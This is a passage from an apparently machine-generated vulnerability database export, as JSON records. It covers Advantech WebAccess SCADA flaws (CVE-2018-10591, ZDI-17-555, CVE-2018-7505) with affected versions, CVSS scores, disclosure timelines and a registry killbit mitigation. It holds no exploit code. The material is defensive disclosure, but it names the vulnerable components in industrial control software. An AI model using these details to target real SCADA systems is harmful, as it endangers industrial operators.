"vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess \u003c=8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNNVD", "id": "CNNVD-201805-449" }, { "db": "NVD", "id": "CVE-2018-10591" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005069" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell, rgod, Steven Seeley, Donato Onofri and Simone Onofri", "sources": [ { "db": "BID", "id": "104190" } ], "trust": 0.3 }, "cve": "CVE-2018-10591", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 2.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "CVE-2018-10591", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "LOW", "trust": 1.8, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-10703", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 2.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "VHN-120366", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "LOW", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.6, "id": "CVE-2018-10591", "impactScore": 4.0, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-10591", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2018-10591", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-10703", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-449", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-120366", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "VULHUB", "id": "VHN-120366" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNNVD", "id": "CNNVD-201805-449" }, { "db": "NVD", "id": "CVE-2018-10591" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an origin validation error vulnerability has been identified, which may allow an attacker can create a malicious web site, steal session cookies, and access data of authenticated users. Advantech WebAccess Contains a session fixation vulnerability.Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-10591" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-120366" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-10591", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNNVD", "id": "CNNVD-201805-449", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-10703", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005069", "trust": 0.8 }, { "db": "IVD", "id": "E2F0BF10-39AB-11E9-AED2-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-120366", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "VULHUB", "id": "VHN-120366" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNNVD", "id": "CNNVD-201805-449" }, { "db": "NVD", "id": "CVE-2018-10591" } ] }, "id": "VAR-201805-0251", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "VULHUB", "id": "VHN-120366" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" } ] }, "last_update_date": "2024-11-23T21:53:07.737000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech WebAccess Source Validation Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/130839" }, { "title": "Multiple Advantech Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80059" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNNVD", "id": "CNNVD-201805-449" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-384", "trust": 1.9 }, { "problemtype": "CWE-346", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-120366" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "NVD", "id": "CVE-2018-10591" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10591" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10591" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "VULHUB", "id": "VHN-120366" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNNVD", "id": "CNNVD-201805-449" }, { "db": "NVD", "id": "CVE-2018-10591" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" }, { "db": "VULHUB", "id": "VHN-120366" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "db": "CNNVD", "id": "CNNVD-201805-449" }, { "db": "NVD", "id": "CVE-2018-10591" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-31T00:00:00", "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10703" }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-120366" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-449" }, { "date": "2018-05-15T22:29:00.363000", "db": "NVD", "id": "CVE-2018-10591" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-31T00:00:00", "db": "CNVD", "id": "CNVD-2018-10703" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-120366" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005069" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-449" }, { "date": "2024-11-21T03:41:37.217000", "db": "NVD", "id": "CVE-2018-10591" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-449" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Source Validation Error Vulnerability", "sources": [ { "db": "IVD", "id": "e2f0bf10-39ab-11e9-aed2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10703" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-449" } ], "trust": 0.6 } }
var-201708-1700
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-555", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-555", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4077", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-555", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ] }, "id": "VAR-201708-1700", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:36:24.155000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-555", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-555", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-555", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Saturation Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-555" } ], "trust": 0.7 } }
var-201805-1146
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a TFTP application has unrestricted file uploads to the web application without authorization, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute code on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the TFTP service. The issue results from the lack of proper validation of user-supplied data, which can allow for the upload of arbitrary files. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A privilege elevation vulnerability exists in several Advantech products that stems from a TFTP application that allows unauthorized uploading of arbitrary files to a web application. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. An escalation of privilege vulnerability exists in several Advantech products. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003c=v8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess scada node", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-470" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "CNNVD", "id": "CNNVD-201805-443" }, { "db": "NVD", "id": "CVE-2018-7505" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005075" } ] }, "credits": { "_id": null, "data": "rgod", "sources": [ { "db": "ZDI", "id": "ZDI-18-470" } ], "trust": 0.7 }, "cve": "CVE-2018-7505", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-7505", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2018-7505", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 